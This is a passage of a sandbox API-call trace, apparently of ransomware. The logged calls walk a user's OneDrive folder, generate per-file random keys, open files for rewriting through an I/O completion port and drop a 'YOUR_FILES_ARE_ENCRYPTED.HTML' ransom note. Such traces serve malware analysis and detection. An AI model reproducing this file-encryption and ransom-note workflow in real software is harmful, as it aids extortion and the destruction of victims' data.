param_1="91") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="5B") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="DF") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="43") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="30") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="F6") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="FD") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="78") returned 2 [0113.517] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="41") returned 2 [0113.517] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="A1") returned 2 [0113.517] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="54") returned 2 [0113.517] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="31") returned 2 [0113.517] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="00") returned 2 [0113.517] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="EF") returned 2 [0113.517] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="38") returned 2 [0113.517] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="05") returned 2 [0113.517] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="61") returned 2 [0113.517] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="C6") returned 2 [0113.517] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="29") returned 2 [0113.518] lstrcpyW (in: lpString1=0x698544, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncApi.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncApi.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncApi.dll" [0113.518] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x688490, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.518] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x688490, lpOverlapped=0x688490) returned 1 [0113.518] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe73272cc, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xe73272cc, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xed477d8a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x1d9ec0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncClient.dll", cAlternateFileName="FILESY~4.DLL")) returned 1 [0113.530] StrStrIW (lpFirst="FileSyncClient.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.530] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncClient.dll") returned 94 [0113.531] PathFindExtensionW (pszPath="FileSyncClient.dll") returned=".dll" [0113.531] lstrlenW (lpString=".dll") returned 4 [0113.531] PathFindExtensionW (pszPath="FileSyncClient.dll") returned=".dll" [0113.531] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncClient.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\filesyncclient.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0113.531] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=1941184) returned 1 [0113.531] GetProcessHeap () returned 0x600000 [0113.531] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.533] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="29") returned 2 [0113.533] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="22") returned 2 [0113.533] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="1A") returned 2 [0113.533] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="DB") returned 2 [0113.533] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="1B") returned 2 [0113.533] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="E7") returned 2 [0113.533] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="78") returned 2 [0113.533] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="5B") returned 2 [0113.533] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="D5") returned 2 [0113.533] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="88") returned 2 [0113.534] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="3E") returned 2 [0113.534] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="E1") returned 2 [0113.534] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="EC") returned 2 [0113.534] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="74") returned 2 [0113.534] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="43") returned 2 [0113.534] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="DC") returned 2 [0113.534] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="6E") returned 2 [0113.534] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="FA") returned 2 [0113.534] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="82") returned 2 [0113.534] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="82") returned 2 [0113.534] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="26") returned 2 [0113.534] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="63") returned 2 [0113.534] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="A0") returned 2 [0113.534] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="5D") returned 2 [0113.534] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="21") returned 2 [0113.534] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="FC") returned 2 [0113.534] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="6F") returned 2 [0113.534] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="42") returned 2 [0113.534] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="AE") returned 2 [0113.534] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="26") returned 2 [0113.534] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="47") returned 2 [0113.534] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="7C") returned 2 [0113.535] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncClient.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncClient.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncClient.dll" [0113.535] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.535] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.535] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef2d450f, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xef2d450f, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xefae0564, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x238c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncConfig.exe", cAlternateFileName="FILESY~1.EXE")) returned 1 [0113.535] StrStrIW (lpFirst="FileSyncConfig.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.535] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncConfig.exe") returned 94 [0113.535] PathFindExtensionW (pszPath="FileSyncConfig.exe") returned=".exe" [0113.535] lstrlenW (lpString=".exe") returned 4 [0113.535] PathFindExtensionW (pszPath="FileSyncConfig.exe") returned=".exe" [0113.535] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf016ee08, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf016ee08, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf515bba6, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x1464c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncSessions.dll", cAlternateFileName="FIFC38~1.DLL")) returned 1 [0113.536] StrStrIW (lpFirst="FileSyncSessions.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.536] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncSessions.dll") returned 96 [0113.536] PathFindExtensionW (pszPath="FileSyncSessions.dll") returned=".dll" [0113.536] lstrlenW (lpString=".dll") returned 4 [0113.536] PathFindExtensionW (pszPath="FileSyncSessions.dll") returned=".dll" [0113.536] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncSessions.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\filesyncsessions.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0113.537] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=1336512) returned 1 [0113.537] GetProcessHeap () returned 0x600000 [0113.537] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32a0048 [0113.541] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="49") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="29") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="DB") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="F7") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="CC") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="B9") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="1F") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="DE") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="F4") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="2E") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="F2") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="8F") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="4A") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="A3") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="93") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="6B") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="88") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="0E") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="F9") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="68") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="91") returned 2 [0113.541] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="BE") returned 2 [0113.541] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="D8") returned 2 [0113.541] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="81") returned 2 [0113.541] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="AA") returned 2 [0113.541] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="54") returned 2 [0113.541] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="D2") returned 2 [0113.541] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="7A") returned 2 [0113.541] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="53") returned 2 [0113.542] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="E5") returned 2 [0113.542] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="A1") returned 2 [0113.542] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="04") returned 2 [0113.542] lstrcpyW (in: lpString1=0x32b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncSessions.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncSessions.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncSessions.dll" [0113.542] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x32a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.542] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32a0048, lpOverlapped=0x32a0048) returned 1 [0113.542] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5a72c24, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf5a72c24, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xfd98e121, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x182cc0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncShell.dll", cAlternateFileName="FI340C~1.DLL")) returned 1 [0113.542] StrStrIW (lpFirst="FileSyncShell.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.542] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncShell.dll") returned 93 [0113.542] PathFindExtensionW (pszPath="FileSyncShell.dll") returned=".dll" [0113.542] lstrlenW (lpString=".dll") returned 4 [0113.542] PathFindExtensionW (pszPath="FileSyncShell.dll") returned=".dll" [0113.542] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncShell.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\filesyncshell.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0113.543] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=1584320) returned 1 [0113.543] GetProcessHeap () returned 0x600000 [0113.543] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32c81a0 [0113.545] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="73") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="CF") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="1A") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="22") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="A3") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="7B") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="2A") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="45") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="C9") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="9C") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="D6") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="53") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="9B") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="AF") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="81") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="4D") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="B0") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="FF") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="8F") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="77") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="BC") returned 2 [0113.545] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="DA") returned 2 [0113.545] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="AF") returned 2 [0113.545] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="F4") returned 2 [0113.546] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="95") returned 2 [0113.546] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="A6") returned 2 [0113.546] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="9C") returned 2 [0113.546] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="60") returned 2 [0113.546] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="9E") returned 2 [0113.547] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="FA") returned 2 [0113.547] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="8A") returned 2 [0113.547] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="52") returned 2 [0113.548] lstrcpyW (in: lpString1=0x32d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncShell.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncShell.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncShell.dll" [0113.548] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x32c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.548] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32c81a0, lpOverlapped=0x32c81a0) returned 1 [0113.548] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ca54abd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7ca54abd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7ca54abd, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="fr", cAlternateFileName="")) returned 1 [0113.548] StrStrIW (lpFirst="fr", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.548] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fr") returned 78 [0113.548] GetProcessHeap () returned 0x600000 [0113.548] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x32f02f8 [0113.549] lstrcpyW (in: lpString1=0x32f02f8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fr" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fr") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fr" [0113.549] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fr\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fr\\*" [0113.549] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fr\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ca54abd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7ca54abd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7ec4e3f5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.553] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ca54abd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7ca54abd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x7ec4e3f5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.553] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ec4e3f5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7ec4e3f5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8031affd, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x176c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.553] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.553] wnsprintfW (in: pszDest=0x32f02f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fr\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.553] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.553] lstrlenW (lpString=".mui") returned 4 [0113.553] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.553] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ec4e3f5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7ec4e3f5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8031affd, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x176c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.553] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.553] wnsprintfW (in: pszDest=0x32f02f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.553] GetProcessHeap () returned 0x600000 [0113.553] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\fr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\fr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0113.559] WriteFile (in: hFile=0x308, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.560] CloseHandle (hObject=0x308) returned 1 [0113.560] GetProcessHeap () returned 0x600000 [0113.560] HeapFree (in: hHeap=0x600000, dwFlags=0x0, 